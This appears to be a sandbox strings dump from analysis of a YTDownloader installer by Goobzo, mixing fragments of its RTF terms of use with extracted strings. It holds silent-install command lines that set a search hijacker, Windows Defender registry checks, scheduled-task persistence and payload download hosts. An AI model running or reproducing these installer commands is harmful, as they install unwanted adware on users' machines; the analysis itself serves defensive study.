{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

?/?6?<?_?

9":(:,:0:4:

<*=/=9=|=

3#3'3 3/333

8 8$8(8,8084888<8@8

5 5$5(5,5

,=0=4=8=<=

: :(:0:8:

>4?8?<?@?

<$<,<4<<<

= =@=`=|=

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\DC%original file name%.exe

2.8.0.999

ins_smk.exe_1968:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf6.tmp\nsExec.dll

SMUninstall.exe

rObject.dll

, /urlset=searching /remote

-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf6.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf6.tmp

on\App Paths\smu.exe

-b618-e21031d2ec12, /urlset=searching /remote

hXXp://VVV.usertrust.com1

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t

1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%

hXXp://ocsp.usertrust.com0

hXXps://secure.comodo.net/CPS0A

0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r

0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$

hXXp://ocsp.comodoca.com0

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

.reloc

SShL0

PeekNamedPipe

CreatePipe

nsExec.dll

:":2:7:@:

`.rsrc

@.reloc

lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet

v2.0.50727

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy7.tmp

nsy7.tmp

datePlus\smu.exe" /install /pin:1 "/s:F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12," "/is:1" "/it:1" "/ih:1" "/ei:1" "/ci:1" "/fi:1" "/oi:1" "/urlset:searching""

/db=all /is=1 /ih=1 /sparam=F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

DK0,99999999-9999-451f-b618-e21031d2ec12,

k.exe /S /db=all /is=1 /ih=1 /sparam=F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

am=F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_2353\ins_smk.exe /S /db=all /is=1 /ih=1 /sparam=F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

%Program Files%\Common Files\Goobzo\GBUpdatePlus

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_2353

ins_smk.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_2353\ins_smk.exe

Software\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus

/S /db=all /is=1 /ih=1 /sparam=F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12, /urlset=searching /remote

223115900

F6PzSMTDK0,99999999-9999-451f-b618-e21031d2ec12,

smei32.dll

smei64.dll

)-.Yln

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

2.1.9.476

smw.exe

ins_smk.exe_1968_rwx_10004000_00001000:

callback%d

smu.exe_700:

.text

`.rdata

@.data

